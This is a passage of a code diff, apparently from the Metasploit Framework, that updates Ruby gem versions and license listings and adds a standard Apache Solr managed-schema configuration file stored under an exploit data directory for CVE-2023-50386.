     mustermann (3.0.0)
       ruby2_keywords (~> 0.0.1)
+    mutex_m (0.2.0)
     nessus_rest (0.1.6)
-    net-imap (0.4.0)
+    net-imap (0.4.12)
       date
       net-protocol
-    net-ldap (0.18.0)
-    net-protocol (0.2.1)
+    net-ldap (0.19.0)
+    net-protocol (0.2.2)
       timeout
-    net-smtp (0.4.0)
+    net-sftp (4.0.0)
+      net-ssh (>= 5.0.0, < 8.0.0)
+    net-smtp (0.5.0)
       net-protocol
-    net-ssh (7.2.0)
+    net-ssh (7.2.3)
     network_interface (0.0.4)
     nexpose (7.3.0)
-    nio4r (2.5.9)
-    nokogiri (1.14.5)
-      mini_portile2 (~> 2.8.0)
+    nio4r (2.7.3)
+    nokogiri (1.16.5)
+      mini_portile2 (~> 2.8.2)
       racc (~> 1.4)
-    nori (2.6.0)
+    nori (2.7.0)
+      bigdecimal
     octokit (4.25.1)
       faraday (>= 1, < 3)
       sawyer (~> 0.9)
@@ -327,31 +346,32 @@ GEM
     openvas-omp (0.0.4)
     packetfu (2.0.0)
       pcaprub (~> 0.13.1)
-    parallel (1.23.0)
-    parser (3.2.2.4)
+    parallel (1.24.0)
+    parser (3.3.2.0)
       ast (~> 2.4.1)
       racc
     patch_finder (1.0.2)
-    pcaprub (0.13.1)
-    pdf-reader (2.11.0)
+    pcaprub (0.13.2)
+    pdf-reader (2.12.0)
       Ascii85 (~> 1.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
       ruby-rc4
       ttfunk
-    pg (1.5.4)
+    pg (1.5.6)
     pry (0.14.2)
       coderay (~> 1.1)
       method_source (~> 1.0)
     pry-byebug (3.10.1)
       byebug (~> 11.0)
       pry (>= 0.13, < 0.15)
-    public_suffix (5.0.3)
-    puma (6.4.0)
+    public_suffix (5.0.5)
+    puma (6.4.2)
       nio4r (~> 2.0)
-    racc (1.7.1)
-    rack (2.2.8)
-    rack-protection (3.1.0)
+    racc (1.8.0)
+    rack (2.2.9)
+    rack-protection (3.2.0)
+      base64 (>= 0.1.0)
       rack (~> 2.2, >= 2.2.4)
     rack-test (2.1.0)
       rack (>= 1.3)
@@ -362,23 +382,23 @@ GEM
     rails-html-sanitizer (1.6.0)
       loofah (~> 2.21)
       nokogiri (~> 1.14)
-    railties (7.0.8)
-      actionpack (= 7.0.8)
-      activesupport (= 7.0.8)
+    railties (7.0.8.4)
+      actionpack (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
       method_source
       rake (>= 12.2)
       thor (~> 1.0)
       zeitwerk (~> 2.5)
     rainbow (3.1.1)
-    rake (13.0.6)
-    rasn1 (0.12.1)
+    rake (13.2.1)
+    rasn1 (0.13.0)
       strptime (~> 0.2.5)
     rb-readline (0.5.5)
-    recog (3.1.2)
+    recog (3.1.5)
       nokogiri
     redcarpet (3.6.0)
-    regexp_parser (2.8.1)
-    reline (0.4.1)
+    regexp_parser (2.9.2)
+    reline (0.5.8)
       io-console (~> 0.5)
     require_all (3.0.0)
     rex-arch (0.1.15)
@@ -389,7 +409,7 @@ GEM
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.31)
+    rex-core (0.1.32)
     rex-encoder (0.1.7)
       metasm
       rex-arch
@@ -412,7 +432,7 @@ GEM
       rex-random_identifier
       rex-text
       ruby-rc4
-    rex-random_identifier (0.1.11)
+    rex-random_identifier (0.1.12)
       rex-text
     rex-registry (0.1.5)
     rex-rop_builder (0.1.5)
@@ -426,10 +446,11 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.4)
-    rex-text (0.2.57)
+    rex-text (0.2.58)
     rex-zip (0.1.5)
       rex-text
-    rexml (3.2.6)
+    rexml (3.2.8)
+      strscan (>= 3.0.9)
     rkelly-remix (0.0.7)
     rspec (3.13.0)
       rspec-core (~> 3.13.0)
@@ -440,47 +461,47 @@ GEM
     rspec-expectations (3.13.0)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.0)
+    rspec-mocks (3.13.1)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.13.0)
-    rspec-rails (6.0.3)
+    rspec-rails (6.1.2)
       actionpack (>= 6.1)
       activesupport (>= 6.1)
       railties (>= 6.1)
-      rspec-core (~> 3.12)
-      rspec-expectations (~> 3.12)
-      rspec-mocks (~> 3.12)
-      rspec-support (~> 3.12)
+      rspec-core (~> 3.13)
+      rspec-expectations (~> 3.13)
+      rspec-mocks (~> 3.13)
+      rspec-support (~> 3.13)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.13.0)
-    rubocop (1.56.4)
-      base64 (~> 0.1.1)
+    rspec-support (3.13.1)
+    rubocop (1.64.1)
       json (~> 2.3)
       language_server-protocol (>= 3.17.0)
       parallel (~> 1.10)
-      parser (>= 3.2.2.3)
+      parser (>= 3.3.0.2)
       rainbow (>= 2.2.2, < 4.0)
       regexp_parser (>= 1.8, < 3.0)
       rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.1, < 2.0)
+      rubocop-ast (>= 1.31.1, < 2.0)
       ruby-progressbar (~> 1.7)
       unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.29.0)
-      parser (>= 3.2.1.0)
-    ruby-macho (4.0.0)
+    rubocop-ast (1.31.3)
+      parser (>= 3.3.1.0)
+    ruby-macho (4.0.1)
     ruby-mysql (4.1.0)
     ruby-prof (1.4.2)
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.5)
+    ruby_smb (3.3.9)
       bindata (= 2.4.15)
       openssl-ccm
       openssl-cmac
       rubyntlm
       windows_error (>= 0.1.4)
-    rubyntlm (0.6.3)
+    rubyntlm (0.6.4)
+      base64
     rubyzip (2.3.2)
     sawyer (0.9.2)
       addressable (>= 2.3.5)
@@ -489,36 +510,34 @@ GEM
       docile (~> 1.1)
       simplecov-html (~> 0.11)
     simplecov-html (0.12.3)
-    simpleidn (0.2.1)
-      unf (~> 0.1.4)
-    sinatra (3.1.0)
+    simpleidn (0.2.3)
+    sinatra (3.2.0)
       mustermann (~> 3.0)
       rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.1.0)
+      rack-protection (= 3.2.0)
       tilt (~> 2.0)
-    sqlite3 (1.6.6)
+    sqlite3 (1.7.3)
       mini_portile2 (~> 2.8.0)
     sshkey (3.0.0)
     strptime (0.2.5)
+    strscan (3.1.0)
     swagger-blocks (3.0.0)
     systemu (2.6.5)
-    test-prof (1.2.3)
+    test-prof (1.3.3)
     thin (1.8.2)
       daemons (~> 1.0, >= 1.0.9)
       eventmachine (~> 1.0, >= 1.0.4)
       rack (>= 1, < 3)
-    thor (1.2.2)
+    thor (1.3.1)
     tilt (2.3.0)
-    timecop (0.9.8)
-    timeout (0.4.0)
-    ttfunk (1.7.0)
+    timecop (0.9.9)
+    timeout (0.4.1)
+    ttfunk (1.8.0)
+      bigdecimal (~> 3.1)
     tzinfo (2.0.6)
       concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2023.3)
+    tzinfo-data (1.2024.1)
       tzinfo (>= 1.0.0)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
     unicode-display_width (2.5.0)
     unix-crypt (1.3.1)
     uuid (2.3.9)
@@ -546,7 +565,7 @@ GEM
     xmlrpc (0.3.3)
       webrick
     yard (0.9.36)
-    zeitwerk (2.6.12)
+    zeitwerk (2.6.15)
 
 PLATFORMS
   ruby

LICENSE_GEMS

@@ -1,144 +1,152 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.0, MIT
-actionpack, 7.0.8, MIT
-actionview, 7.0.8, MIT
-activemodel, 7.0.8, MIT
-activerecord, 7.0.8, MIT
-activesupport, 7.0.8, MIT
-addressable, 2.8.5, "Apache 2.0"
+Ascii85, 1.1.1, MIT
+aarch64, 2.1.0, "Apache 2.0"
+abbrev, 0.1.2, "ruby, Simplified BSD"
+actionpack, 7.0.8.4, MIT
+actionview, 7.0.8.4, MIT
+activemodel, 7.0.8.4, MIT
+activerecord, 7.0.8.4, MIT
+activesupport, 7.0.8.4, MIT
+addressable, 2.8.6, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.23.0, "Apache 2.0"
-allure-ruby-commons, 2.23.0, "Apache 2.0"
+allure-rspec, 2.24.5, "Apache 2.0"
+allure-ruby-commons, 2.24.5, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
-aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.834.0, "Apache 2.0"
-aws-sdk-core, 3.185.1, "Apache 2.0"
-aws-sdk-ec2, 1.411.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
-aws-sdk-iam, 1.87.0, "Apache 2.0"
-aws-sdk-kms, 1.72.0, "Apache 2.0"
-aws-sdk-s3, 1.136.0, "Apache 2.0"
-aws-sdk-ssm, 1.158.0, "Apache 2.0"
-aws-sigv4, 1.6.0, "Apache 2.0"
-base64, 0.1.1, "ruby, Simplified BSD"
-bcrypt, 3.1.19, MIT
-bcrypt_pbkdf, 1.1.0, MIT
+aws-eventstream, 1.3.0, "Apache 2.0"
+aws-partitions, 1.941.0, "Apache 2.0"
+aws-sdk-core, 3.197.0, "Apache 2.0"
+aws-sdk-ec2, 1.460.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.41.0, "Apache 2.0"
+aws-sdk-iam, 1.99.0, "Apache 2.0"
+aws-sdk-kms, 1.83.0, "Apache 2.0"
+aws-sdk-s3, 1.152.0, "Apache 2.0"
+aws-sdk-ssm, 1.170.0, "Apache 2.0"
+aws-sigv4, 1.8.0, "Apache 2.0"
+base64, 0.2.0, "ruby, Simplified BSD"
+bcrypt, 3.1.20, MIT
+bcrypt_pbkdf, 1.1.1, MIT
+bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.16.0, MIT
-bson, 4.15.0, "Apache 2.0"
+bootsnap, 1.18.3, MIT
+bson, 5.0.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.2, MIT
-cookiejar, 0.3.3, unknown
+concurrent-ruby, 1.3.1, MIT
+cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
+csv, 3.3.0, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.3, "ruby, Simplified BSD"
+date, 3.3.4, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.70.0, "Apache 2.0"
+dnsruby, 1.72.1, "Apache 2.0"
 docile, 1.4.0, MIT
-domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
+drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
 erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.2.1, MIT
-factory_bot_rails, 6.2.0, MIT
-faker, 3.2.1, MIT
+factory_bot, 6.4.6, MIT
+factory_bot_rails, 6.4.3, MIT
+faker, 3.4.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.2.0, MIT
+faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
-ffi, 1.16.3, "New BSD"
+ffi, 1.17.0, "New BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.5, MIT
+http-cookie, 1.0.6, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.14.1, MIT
-io-console, 0.6.0, "ruby, Simplified BSD"
+i18n, 1.14.5, MIT
+io-console, 0.7.2, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.3, ruby
+json, 2.7.2, ruby
 language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
-logging, 2.3.1, MIT
-loofah, 2.21.3, MIT
+logging, 2.4.0, MIT
+loofah, 2.22.0, MIT
 macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.7, "New BSD"
-metasploit-framework, 6.4.4, "New BSD"
+metasploit-credential, 6.0.9, "New BSD"
+metasploit-framework, 6.4.16, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.3, "New BSD"
-metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
-method_source, 1.0.0, MIT
-mime-types, 3.5.1, MIT
-mime-types-data, 3.2023.1003, MIT
-mini_portile2, 2.8.4, MIT
-minitest, 5.20.0, MIT
+metasploit_payloads-mettle, 1.0.28, "3-clause (or ""modified"") BSD"
+method_source, 1.1.0, MIT
+mime-types, 3.5.2, MIT
+mime-types-data, 3.2024.0604, MIT
+mini_portile2, 2.8.7, MIT
+minitest, 5.23.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
+mutex_m, 0.2.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.0, "ruby, Simplified BSD"
-net-ldap, 0.18.0, MIT
-net-protocol, 0.2.1, "ruby, Simplified BSD"
-net-smtp, 0.4.0, "ruby, Simplified BSD"
-net-ssh, 7.2.0, MIT
+net-imap, 0.4.12, "ruby, Simplified BSD"
+net-ldap, 0.19.0, MIT
+net-protocol, 0.2.2, "ruby, Simplified BSD"
+net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-ssh, 7.2.3, MIT
+net-sftp, 4.0.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.9, MIT
-nokogiri, 1.14.5, MIT
-nori, 2.6.0, MIT
+nio4r, 2.7.3, "MIT, Simplified BSD"
+nokogiri, 1.16.5, MIT
+nori, 2.7.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 2.0.0, "New BSD"
-parallel, 1.23.0, MIT
-parser, 3.2.2.4, MIT
+parallel, 1.24.0, MIT
+parser, 3.3.2.0, MIT
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.11.0, MIT
-pg, 1.5.4, "Simplified BSD"
+pcaprub, 0.13.2, LGPL-2.1
+pdf-reader, 2.12.0, MIT
+pg, 1.5.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.3, MIT
-puma, 6.4.0, "New BSD"
-racc, 1.7.1, "ruby, Simplified BSD"
-rack, 2.2.8, MIT
-rack-protection, 3.1.0, MIT
+public_suffix, 5.0.5, MIT
+puma, 6.4.2, "New BSD"
+racc, 1.8.0, "ruby, Simplified BSD"
+rack, 2.2.9, MIT
+rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.2.0, MIT
 rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8, MIT
+railties, 7.0.8.4, MIT
 rainbow, 3.1.1, MIT
-rake, 13.0.6, MIT
-rasn1, 0.12.1, MIT
+rake, 13.2.1, MIT
+rasn1, 0.13.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.2, unknown
+recog, 3.1.5, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.8.1, MIT
-reline, 0.4.1, ruby
+regexp_parser, 2.9.2, MIT
+reline, 0.5.8, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.15, "New BSD"
 rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.31, "New BSD"
+rex-core, 0.1.32, "New BSD"
 rex-encoder, 0.1.7, "New BSD"
 rex-exploitation, 0.1.39, "New BSD"
 rex-java, 0.1.7, "New BSD"
@@ -146,55 +154,54 @@ rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
 rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.11, "New BSD"
+rex-random_identifier, 0.1.12, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
 rex-socket, 0.1.57, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.57, "New BSD"
+rex-text, 0.2.58, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.2.6, "Simplified BSD"
+rexml, 3.2.8, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
 rspec-core, 3.13.0, MIT
 rspec-expectations, 3.13.0, MIT
-rspec-mocks, 3.13.0, MIT
-rspec-rails, 6.0.3, MIT
+rspec-mocks, 3.13.1, MIT
+rspec-rails, 6.1.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.0, MIT
-rubocop, 1.56.4, MIT
-rubocop-ast, 1.29.0, MIT
-ruby-macho, 4.0.0, MIT
+rspec-support, 3.13.1, MIT
+rubocop, 1.64.1, MIT
+rubocop-ast, 1.31.3, MIT
+ruby-macho, 4.0.1, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.4, "New BSD"
-rubyntlm, 0.6.3, MIT
+ruby_smb, 3.3.9, "New BSD"
+rubyntlm, 0.6.4, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
-simpleidn, 0.2.1, MIT
-sinatra, 3.1.0, MIT
-sqlite3, 1.6.6, "New BSD"
+simpleidn, 0.2.3, MIT
+sinatra, 3.2.0, MIT
+sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
+strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.2.3, MIT
+test-prof, 1.3.3, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.2.2, MIT
+thor, 1.3.1, MIT
 tilt, 2.3.0, MIT
-timecop, 0.9.8, MIT
-timeout, 0.4.0, "ruby, Simplified BSD"
-ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
+timecop, 0.9.9, MIT
+timeout, 0.4.1, "ruby, Simplified BSD"
+ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2023.3, MIT
-unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.2, MIT
+tzinfo-data, 1.2024.1, MIT
 unicode-display_width, 2.5.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
@@ -208,4 +215,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.36, MIT
-zeitwerk, 2.6.12, MIT
+zeitwerk, 2.6.15, MIT

data/exploits/CVE-2023-50386/conf/managed-schema.xml

@@ -0,0 +1,244 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<schema name="default-config" version="1.6">
+
+    <field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" />
+    <field name="_version_" type="plong" indexed="false" stored="false"/>
+    <field name="_root_" type="string" indexed="true" stored="false" docValues="false" />
+    <field name="_nest_path_" type="_nest_path_" /><fieldType name="_nest_path_" class="solr.NestPathField" />
+    <field name="_text_" type="text_general" indexed="true" stored="false" multiValued="true"/>
+    <dynamicField name="*_i"  type="pint"    indexed="true"  stored="true"/>
+    <dynamicField name="*_is" type="pints"    indexed="true"  stored="true"/>
+    <dynamicField name="*_s"  type="string"  indexed="true"  stored="true" />
+    <dynamicField name="*_ss" type="strings"  indexed="true"  stored="true"/>
+    <dynamicField name="*_l"  type="plong"   indexed="true"  stored="true"/>
+    <dynamicField name="*_ls" type="plongs"   indexed="true"  stored="true"/>
+    <dynamicField name="*_t" type="text_general" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt" type="text_general" indexed="true" stored="true"/>
+    <dynamicField name="*_b"  type="boolean" indexed="true" stored="true"/>
+    <dynamicField name="*_bs" type="booleans" indexed="true" stored="true"/>
+    <dynamicField name="*_f"  type="pfloat"  indexed="true"  stored="true"/>
+    <dynamicField name="*_fs" type="pfloats"  indexed="true"  stored="true"/>
+    <dynamicField name="*_d"  type="pdouble" indexed="true"  stored="true"/>
+    <dynamicField name="*_ds" type="pdoubles" indexed="true"  stored="true"/>
+    <dynamicField name="random_*" type="random"/>
+    <dynamicField name="ignored_*" type="ignored"/>
+    <dynamicField name="*_str" type="strings" stored="false" docValues="true" indexed="false" useDocValuesAsStored="false"/>
+    <dynamicField name="*_dt"  type="pdate"    indexed="true"  stored="true"/>
+    <dynamicField name="*_dts" type="pdate"    indexed="true"  stored="true" multiValued="true"/>
+    <dynamicField name="*_p"  type="location" indexed="true" stored="true"/>
+    <dynamicField name="*_srpt"  type="location_rpt" indexed="true" stored="true"/>
+    <dynamicField name="*_dpf" type="delimited_payloads_float" indexed="true"  stored="true"/>
+    <dynamicField name="*_dpi" type="delimited_payloads_int" indexed="true"  stored="true"/>
+    <dynamicField name="*_dps" type="delimited_payloads_string" indexed="true"  stored="true"/>
+    <dynamicField name="attr_*" type="text_general" indexed="true" stored="true" multiValued="true"/>
+    <uniqueKey>id</uniqueKey>
+    <fieldType name="string" class="solr.StrField" sortMissingLast="true" docValues="true" />
+    <fieldType name="strings" class="solr.StrField" sortMissingLast="true" multiValued="true" docValues="true" />
+    <fieldType name="boolean" class="solr.BoolField" sortMissingLast="true"/>
+    <fieldType name="booleans" class="solr.BoolField" sortMissingLast="true" multiValued="true"/>
+    <fieldType name="pint" class="solr.IntPointField" docValues="true"/>
+    <fieldType name="pfloat" class="solr.FloatPointField" docValues="true"/>
+    <fieldType name="plong" class="solr.LongPointField" docValues="true"/>
+    <fieldType name="pdouble" class="solr.DoublePointField" docValues="true"/>
+    <fieldType name="pints" class="solr.IntPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pfloats" class="solr.FloatPointField" docValues="true" multiValued="true"/>
+    <fieldType name="plongs" class="solr.LongPointField" docValues="true" multiValued="true"/>
+    <fieldType name="pdoubles" class="solr.DoublePointField" docValues="true" multiValued="true"/>
+    <fieldType name="random" class="solr.RandomSortField" indexed="true"/>
+    <fieldType name="ignored" stored="false" indexed="false" multiValued="true" class="solr.StrField" />
+    <fieldType name="pdate" class="solr.DatePointField" docValues="true"/>
+    <fieldType name="pdates" class="solr.DatePointField" docValues="true" multiValued="true"/>
+    <fieldType name="binary" class="solr.BinaryField"/>
+    <fieldType name="rank" class="solr.RankField"/>
+    <dynamicField name="*_ws" type="text_ws"  indexed="true"  stored="true"/>
+    <fieldType name="text_ws" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="text_general" class="solr.TextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_t_sort" type="text_gen_sort" indexed="true" stored="true" multiValued="false"/>
+    <dynamicField name="*_txt_sort" type="text_gen_sort" indexed="true" stored="true"/>
+    <fieldType name="text_gen_sort" class="solr.SortableTextField" positionIncrementGap="100" multiValued="true">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="lowercase"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en" type="text_en"  indexed="true"  stored="true"/>
+    <fieldType name="text_en" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="lowercase"/>
+        <filter name="englishPossessive"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split" type="text_en_splitting"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="1" catenateNumbers="1" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop"
+                ignoreCase="true"
+                words="lang/stopwords_en.txt"
+        />
+        <filter name="wordDelimiterGraph" generateWordParts="1" generateNumberParts="1" catenateWords="0" catenateNumbers="0" catenateAll="0" splitOnCaseChange="1"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="porterStem"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_en_split_tight" type="text_en_splitting_tight"  indexed="true"  stored="true"/>
+    <fieldType name="text_en_splitting_tight" class="solr.TextField" positionIncrementGap="100" autoGeneratePhraseQueries="true">
+      <analyzer type="index">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+        <filter name="flattenGraph" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="whitespace"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="false"/>
+        <filter name="stop" ignoreCase="true" words="lang/stopwords_en.txt"/>
+        <filter name="wordDelimiterGraph" generateWordParts="0" generateNumberParts="0" catenateWords="1" catenateNumbers="1" catenateAll="0"/>
+        <filter name="lowercase"/>
+        <filter name="keywordMarker" protected="protwords.txt"/>
+        <filter name="englishMinimalStem"/>
+        <filter name="removeDuplicates"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_rev" type="text_general_rev"  indexed="true"  stored="true"/>
+    <fieldType name="text_general_rev" class="solr.TextField" positionIncrementGap="100">
+      <analyzer type="index">
+        <tokenizer name="standard"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+        <filter name="reversedWildcard" withOriginal="true"
+                maxPosAsterisk="3" maxPosQuestion="2" maxFractionAsterisk="0.33"/>
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="standard"/>
+        <filter name="synonymGraph" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
+        <filter name="stop" ignoreCase="true" words="stopwords.txt" />
+        <filter name="lowercase"/>
+      </analyzer>
